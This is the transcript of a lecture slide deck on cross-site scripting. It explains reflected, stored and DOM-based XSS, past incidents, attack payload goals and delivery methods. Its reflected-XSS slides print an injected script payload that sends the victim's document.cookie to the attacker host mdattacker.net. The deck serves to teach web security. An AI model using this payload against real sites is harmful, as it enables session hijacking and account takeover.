presented by: chandra kollipara. cross-site scripting: cross-site scripting attacks are a type of...
TRANSCRIPT
![Page 1: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/1.jpg)
Chapter 12: Attacking Users: Cross-Site Scripting
Presented By:Chandra Kollipara
![Page 2: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/2.jpg)
Cross-Site Scripting:Cross-Site Scripting attacks are a type of
injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user
![Page 3: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/3.jpg)
“Users get compromised because they are not security-conscious”
“You can’t own a web application via XSS.”
![Page 4: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/4.jpg)
Types of XSS:
ReflectedStored DOM-based
![Page 5: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/5.jpg)
Reflected XSS:
http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred
![Page 6: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/6.jpg)
http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>
![Page 7: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/7.jpg)
Exploiting the vulnerability
![Page 8: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/8.jpg)
http://mdsec.net/error/5/Error.ashx?message=<script>var+i=new+Image;+i.src=”http://mdattacker.net/”%2bdocument.cookie;</script>
var i=new Image; i.src=”http://mdattacker.net/”+ document.cookie;
![Page 9: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/9.jpg)
Q. Why doesn’t the attacker simply host a malicious script on mdattacker.net and feed the user a direct link to this script?
![Page 10: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/10.jpg)
Stored XSS Vulnerability:Data submitted by one user is stored in the
application (typically in a back-end database) and then is displayed to other users without being filtered or sanitized appropriately.
It involves two requests:The attacker posts some crafted data
containing malicious code that the application stores.
A victim views a page containing the attacker’s data, and the malicious code is executed when the script is executed in the victim’s browser.
![Page 11: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/11.jpg)
![Page 12: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/12.jpg)
DOM-based XSS Vulnerability:DOM-based XSS vulnerabilities are more
similar to reflected XSS bugs than to stored XSS bugs.
Their exploitation typically involves an attacker’s inducing a user to access a crafted URL containing malicious code.
The server’s response to that specific request causes the malicious code to be executed.
![Page 13: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/13.jpg)
![Page 14: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/14.jpg)
XSS Attacks in Action:In 2010, the Apache Foundation was compromised
via a refl ected XSS attack within its issue-tracking application.
http://blogs.apache.org/infra/entry/apache_org_04_09_2010In 2005, the social networking site MySpace was
found to be vulnerable to a stored XSS attack. http://namb.la/popular/tech.htmlIn 2009, Twitter fell victim to two XSS worms.www.cgisecurity.com/2009/04/two-xss-worms-slam-
twitter.htmlhttp://blog.mindedsecurity.com/2010/09/twitter-domxss-
wrong-fix-andsomething.html
![Page 15: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/15.jpg)
Payload for XSS Attacks:It involves capturing a victim’s session token,
hijacking her session, and thereby making use of the application “as” the victim, performing arbitrary actions and potentially taking ownership of that user’s account.
Virtual DefacementInjecting Trojan FunctionalityInducing user actions
![Page 16: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/16.jpg)
Virtual Defacement
![Page 17: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/17.jpg)
Injecting Trojan functionality
![Page 18: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/18.jpg)
Delivery MechanismsIn a targeted attack, a forged e-mail may be
sent to a single target user or a small number of users
A URL can be fed to a target user in an instant message.
Content and code on third-party websites can be used to generate requests that trigger XSS flaws
Many web applications implement a function to “tell a friend” or send feedback to site administrators.
![Page 19: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/19.jpg)
For Stored XSS:The two kinds of delivery mechanisms for
stored XSS attacks are in-band and out-of-band.
In-band delivery applies in most cases and is used when the data that is the subject of the vulnerability is supplied to the application via its main web interface.
Out-of-band delivery applies in cases where the data that is the subject of the vulnerability is supplied to the application through some other channel
![Page 20: Presented By: Chandra Kollipara. Cross-Site Scripting: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected](https://reader036.vdocuments.site/reader036/viewer/2022062519/5697bfb71a28abf838c9eeb5/html5/thumbnails/20.jpg)
Thank You Questions?